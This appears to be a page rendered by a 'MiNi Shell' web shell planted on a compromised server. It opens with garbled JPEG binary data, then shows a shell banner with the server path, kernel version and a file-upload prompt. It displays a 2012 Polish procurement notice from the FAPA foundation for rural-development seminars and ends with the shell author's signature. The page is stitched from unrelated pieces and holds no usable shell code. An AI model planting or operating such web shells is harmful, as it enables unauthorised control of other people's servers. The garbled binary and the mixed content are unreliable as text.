JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120905/333014-N-2012.html

<p class="kh_header"><b>Warszawa: Zakup usług polegających na organizacji projektu Budowanie systemu wsparcia eksperckiego i doradczego dla lokalnych grup działania (LGD) we wdrażaniu lokalnych strategii rozwoju - cztery seminaria regionalne i jedno seminarium krajowe w terminie do dnia 30 listopada 2012 r.</b><br>
<b>Numer ogłoszenia: 333014 - 2012; data zamieszczenia: 05.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA , ul. Wspólna 30, 00-930 Warszawa, woj. mazowieckie, tel. 22 623 19 01, faks 22 623 19 09.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Fundacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług polegających na organizacji projektu Budowanie systemu wsparcia eksperckiego i doradczego dla lokalnych grup działania (LGD) we wdrażaniu lokalnych strategii rozwoju - cztery seminaria regionalne i jedno seminarium krajowe w terminie do dnia 30 listopada 2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opisz przedmiotu zamówienia:

Przedmiotem zamówienia jest zakup usług polegających na organizacji projektu pt. Budowanie systemu wsparcia eksperckiego i doradczego dla lokalnych grup działania (LGD) we wdrażaniu lokalnych strategii rozwoju - cztery seminaria regionalne i jedno seminarium krajowe
w terminie do dnia 30 listopada 2012 r.

W celu realizacji przedmiotu zamówienia Wykonawca zorganizuje Biuro Projektu, zwane dalej Biurem, odpowiedzialne za całość prac związanych z realizacją przedmiotu zamówienia.

W celu sprawnego funkcjonowania Biura Wykonawca zapewni:

a)	zespół składający się z osób zapewniających prawidłową i terminową realizację projektu,
b)	minimum jeden numer telefonu stacjonarnego, numer telefonu komórkowego, numer faksu oraz adres mailowy i korespondencyjny,
c)	organizację pracy, która umożliwi łatwy kontakt z przedstawicielami Biura. Czas odpowiedzi na zapytanie mailowe nie może przekroczyć dwóch dni roboczych.

Przedstawiciele Biura będą ściśle współpracować z Zamawiającym i na bieżąco dostarczać wszelkich informacji o realizacji Projektu.


W ramach zamówienia Biuro zapewni:

I. Przeprowadzenie czterech 2-dniowych seminariów regionalnych zgodnie z załącznikiem nr 4 do wzoru umowy: Program czterech 2-dniowych seminariów regionalnych, w tym:
1.	opracowanie referatów wprowadzających i wykładów, na  4 seminaria regionalne zgodnie 
z załącznikiem nr 4 do wzoru umowy: Program czterech 2-dniowych seminariów regionalnych;
2.	opracowanie merytoryczne i wydruk zestawów materiałów informacyjnych dla maksymalnie 140 osób w tym maksymalnie 30 uczestników oraz 5 moderatorów wykładowców na każde seminarium regionalne, zawierających skrót referatów, wykładów, sprawozdań zgodnie
z załącznikiem nr 4 do wzoru umowy: Program czterech 2-dniowych seminariów regionalnych, a także analizę stanu wdrażania LSR na obszarze województw objętych procesem rekrutacji na poszczególne seminaria regionalne. Parametry wydruków: papier offset, biały 70-80 g m2, format A4, objętość min. 60 str. (cały zastaw), druk dwustronny 1+1, maksymalnie 140 egz.
Zestawy materiałów informacyjnych na seminaria będą opatrzone logotypami i sloganami zgodnie z załącznikiem nr 8a do wzoru umowy: Wykaz logotypów i sloganów;
3.	zapewnienie maksymalnie 140 zestawów szkoleniowych, odpowiednio do liczby osób 
z przeprowadzonej rekrutacji i przekazanie ich uczestnikom, z których każdy będzie zawierał: 
- teczkę kartonową (format A4, karton, zapinanych gumką), 
- notatnik (format A5, papier offset 70-80g m2 biały w kratkę, min. 50 kartek),
- długopis (plastik, półautomat, 10 mm, wkład wymienny 0,5 mm), 
- torbę papierową (wymiary: 230 x 330 x 75 mm.+ - 5 cm,  papier kredowy lakierowany 120 g m2, uchwyt podwójny sznurkowy),
- poradnik metodyczny zgodnie z pkt III.
Zestawy szkoleniowe na seminaria będą opatrzone logotypami i sloganami zgodnie
z załącznikiem nr 8a do wzoru umowy: Wykaz logotypów i sloganów. Długopisy ze względu na mały rozmiar będą opatrzone samymi logotypami, zgodnie z załącznikiem nr 8b do wzoru umowy: Wykaz logotypów.
4.	na każde z czterech regionalnych seminariów, jedną salę na obrady plenarne mieszczącą maksymalnie  35 osób, wyposażoną w sprzęt audiowizualny oraz 3 sale na obrady zespołów tematycznych mieszczące maksymalnie 15 osób, wyposażone w sprzęt audiowizualny;
5.	rekrutację maksymalnie 140 osób, maksymalnie 35 osób na jedno seminarium regionalne, 
w tym w każdym seminarium maksymalnie 30 uczestników oraz zapewnienie na  każde seminarium 5 moderatorów wykładowców legitymujących się wyższym wykształceniem i co najmniej 6 letnim doświadczeniem w działaniach służących rozwojowi obszarów wiejskich, w tym co najmniej 3 letnim doświadczeniem we współpracy z LGD. Wykonawca przeprowadzi rekrutację uczestników z województwa małopolskiego, wielkopolskiego i mazowieckiego, mając na uwadze to, iż jeden uczestnik może wziąć udział tylko w jednym seminarium regionalnym;
6.	zakwaterowanie (jeden nocleg) w pokojach dwuosobowych ze śniadaniem dla maksymalnie 140 osób, na jedno seminarium maksymalnie 35 osób, w hotelu o standardzie co najmniej 
3-gwiazdkowym lub równoważnym (z osobnym węzłem sanitarnym w każdym pokoju) 
w granicach administracyjnych miasta Kraków, Poznań, Brwinów, Radom w odległości maksymalnie do 1 km od sal wymienionych w pkt 4. W przypadku gdy miejsce zakwaterowania będzie położone w odległości większej niż 1 km od sal wymienionych w pkt 4, Wykonawca zapewni transport uczestników z  miejsca zakwaterowania do sal wymienionych w pkt 4;
7.	wyżywienie dla maksymalnie 140 osób seminarium, na jedno seminarium maksymalnie 35 osób, w tym:
pierwszego dnia:
- dwudaniowy obiad,
- kolacja,
- 2 serwisy kawowe: kawa, herbata, woda, ciastka;
drugiego dnia:
- dwudaniowy obiad,
- serwis kawowy: kawa, herbata, woda, ciastka.

II. Przeprowadzenie 3-dniowego krajowego seminarium zgodnie z załącznikiem nr 5 do wzoru umowy: Program  3-dniowego krajowego seminarium,  w tym:
1.	opracowanie referatów wprowadzających i wykładów na krajowe seminarium zgodnie 
z załącznikiem nr 5 do wzoru umowy: Program 3-dniowego krajowego seminarium;
2. opracowanie merytoryczne i wydruk materiałów informacyjnych dla maksymalnie 50 osób,
w tym 45 uczestników oraz 5 moderatorów wykładowców seminarium krajowego, zawierających skrót referatów, wykładów, sprawozdań zgodnie z załącznikiem nr 5 do wzoru umowy: Program 3-dniowego krajowego seminarium, a także analizę zbiorczą dotyczącą stanu wdrażania LSR na obszarze całej Polski. Parametry wydruków: papier offset, biały 70-80 g m2, format A4, objętość min. 60 str. (cały zastaw), druk dwustronny 1+1. maksymalnie 50 egz.
Zestawy materiałów informacyjnych będą opatrzone  logotypami i sloganami zgodnie 
z załącznikiem nr 8a do wzoru umowy: Wykaz logotypów i sloganów;
3. zapewnienie maksymalnie 25 zestawów szkoleniowych, odpowiednio do liczby osób 
z przeprowadzonej rekrutacji i przekazanie ich uczestnikom, z których każdy będzie zawierał: 
- teczkę kartonową (format A4, karton, zapinanych gumką),
- notatnik (format A5, papier offset 70-80g m2 biały w kratkę, minimum 50 kartek),
- długopis (plastik, półautomat, 10 mm, wkład wymienny 0,5 mm)
- torbę papierową (wymiary: 230 x 330 x 75 mm.,+ - 5 cm, papier kredowy lakierowany 120 g m2, uchwyt podwójny sznurkowy),
- poradnik metodyczny zgodnie z pkt III.
Zestawy szkoleniowe na seminaria będą opatrzone logotypami i sloganami zgodnie
z załącznikiem nr 8a do wzoru umowy: Wykaz logotypów i sloganów. Długopisy ze względu na mały rozmiar będą opatrzone samymi logotypami, zgodnie z załącznikiem nr 8b do wzoru umowy: Wykaz logotypów.
4.  zakwaterowanie (dwa noclegi) w pokojach dwuosobowych ze śniadaniem dla maksymalnie 50 osób w hotelu o standardzie co najmniej 3-gwiazdkowym lub równoważnym (z osobnym węzłem sanitarnym w każdym pokoju) w granicach administracyjnych miasta Kraków,
w odległości maksymalnie do 1 km od sal na obrady plenarne i obrady zespołów tematycznych, które zostały wymienione w pkt 6. W przypadku gdy miejsce zakwaterowania będzie położone w odległości większej niż 1 km od powyżej wskazanych sal, Wykonawca zapewni transport osób z  miejsca zakwaterowania do sal na obrady plenarne i obrady zespołów tematycznych wymienione w pkt 6;
5.	wyżywienie dla maksymalnie 50 osób na seminarium, w tym:
pierwszego dnia:
- dwudaniowy obiad, 
- kolacja,
- 2 serwisy kawowe: kawa, herbata, woda, ciastka;
drugiego dnia:
- dwudaniowy obiad, 
- kolacja,
- 2 serwisy kawowe: kawa, herbata, woda, ciastka;
trzeciego dnia:
- dwudaniowy obiad,
- serwis kawowy: kawa, herbata, woda, ciastka;
6.	jedną salę na obrady plenarne mieszczącą maksymalnie 50 osób, wyposażoną w sprzęt audiowizualny oraz 3 sale na obrady zespołów tematycznych mieszczące maksymalnie 20 osób, wyposażone w sprzęt audiowizualny oraz po jednej sali na każdym wyjeździe studyjnym (razem 4 sale) wyposażonej w sprzęt audiowizualny, na spotkania w trakcie wizyt studyjnych, 
7.	rekrutację maksymalnie 20 osób spośród uczestników seminariów regionalnych oraz rekrutację 25 osób reprezentujących środowiska naukowe, jednostki doradcze publiczne i prywatne zajmujące się działalnością wspierającą LGD we wdrażaniu LSR, przedstawicieli LGD, a także instytucje zarządzającą, wdrażające i płatnicze zaangażowane we wdrażanie PROW 2007-2013 oś 4. Leader oraz zapewni udział 5 moderatorów/wykładowców legitymujących się wyższym wykształceniem i co najmniej 6 letnim doświadczeniem w działaniach służących rozwojowi obszarów wiejskich, w tym co najmniej 3 letnim doświadczeniem we współpracy z LGD;
8.	zapewnienie transportu podczas 3-dniowego krajowego seminarium dla maksymalnie  50 osób, drugiego dnia seminarium, na 4 poniższych trasach:
1) Kraków - Świątniki Górne - Skawina - Kraków,
2) Kraków - Spytkowice - Zator - Kraków,
3) Kraków - Wiśniowa - Siepraw - Kraków,
4) Kraków - Zakliczyn - Ciężkowice - Kraków;
9.	ubezpieczenie maksymalnie 50 osób;
10.	opracowanie i przedstawienia sprawozdań z obrad seminariów regionalnych 
11.	wystawienie zaświadczeń o udziale w seminariach regionalnych.
III. Opracowanie merytoryczne i druk  poradnika metodycznego:
 Poradnik metodyczny w formie druku zwartego, objętość nie mniejszej niż 8 a a. (arkusz autorski - 40.000 znaków typograficznych wraz ze spacjami lub 3.000 cm2 ilustracji) zawierający m.in. ogólne informacje o roli podejścia LEADER w rozwoju obszarów wiejskich, informacje przedstawiające wyniki badań prowadzonych na reprezentatywnej grupie LGD 
z zakresu barier we wdrażaniu LSR i oczekiwanym wsparciu doradczo-eksperckim, informacje z zakresu wsparcia dla zarządzania rozwojem strategicznym organizacji pozarządowej typu partnerstwo trójsektorowe (LGD), oraz zarządzania procesem wdrażania planu strategicznego dla rozwoju obszaru, a także informacje metodyczne z zakresu komunikacji interpersonalnej oraz metod aktywizacji lokalnych społeczności. Parametry wydruków: papier offset, biały 70-80 g m2, format A4, objętość min. 60 str., druk dwustronny 1+1. maksymalnie 165 egz.
Poradnik metodyczny będzie opatrzony logotypami i sloganami zgodnie z załącznikiem nr 8a do wzoru umowy: Wykaz logotypów i sloganów. 

Ostateczny wygląd i treść poradnika metodycznego muszą zostać uzgodnione z Zamawiającym najpóźniej na 7 dni przed datą druku. Wykonawca wykona i dostarczy poradnik metodyczny Zamawiającemu w miejsce przez niego wskazane. Sposób transportu oraz opakowanie poradnika metodycznego musi zapewniać zabezpieczenie przed uszkodzeniami. Za szkody powstałe z winy nienależytego opakowania oraz lub transportu odpowiedzialność ponosi Wykonawca.

Teksty i zdjęcia zamieszczone w poradniku metodycznym muszą być w całości dziełami autorskimi. Nie mogą być wykorzystywane w całości ani w części w innych dziełach przygotowywanych przez Wykonawcę. Zamawiający wymaga przeniesienia majątkowych praw autorskich do poradnika metodycznego zarówno na siebie, jak również Ministerstwo Rolnictwa 
i Rozwoju Wsi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.52.20.00-9, 80.59.00.00-6, 55.10.00.00-1, 55.30.00.00-3, 60.00.00.00-9, 79.82.25.00-7, 79.82.40.00-6, 66.51.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata - w tym okresie, wykonał lub wykonuje, co najmniej 3 (trzy) usługi 
o wartości każdej usługi nie mniejszej niż 140 000,00 zł brutto każda (słownie: sto czterdzieści tysięcy złotych 00/100), z których każda polegała na zapewnieniu kompleksowej organizacji seminariów, szkoleń obejmujących łącznie co najmniej wyżywienie oraz zakwaterowanie uczestników i każda z tych usług organizowana była dla co najmniej 100 osób. Wykonanie jednej usługi jest równoznaczne z wykonaniem jednej umowy (jednego zamówienia na rzecz jednego Zamawiającego).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:
a)	pięcioma osobami posiadającymi wiedzę i doświadczenie niezbędne do realizacji szkoleń będących przedmiotem niniejszego zamówienia, legitymujących się wyższym wykształceniem i co najmniej 6 letnim doświadczeniem w działaniach służących rozwojowi obszarów wiejskich, w tym co najmniej 3 letnim doświadczeniem we współpracy z LGD,
b)	jedną osobą posiadającą wiedzę i doświadczenie niezbędne do merytorycznego opracowania materiałów szkoleniowych, o których mowa w rozdziale III SIWZ,
Wykonawca może zaproponować większą ilość osób uczestniczących w realizacji niniejszego zamówienia, jednakże w takim przypadku, każda osoba wskazana dodatkowo ponad wymagane minimum, musi spełniać powyższy warunek udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.fapa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA, ul. Współna 30, Kancelaria pok. 253.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2012 godzina 11:00, miejsce: Fundacja Programów Pomocy dla Rolnictwa FAPA, ul. Współna 30, Kancelaria pok. 253.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Schemat III Pomocy Technicznej Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com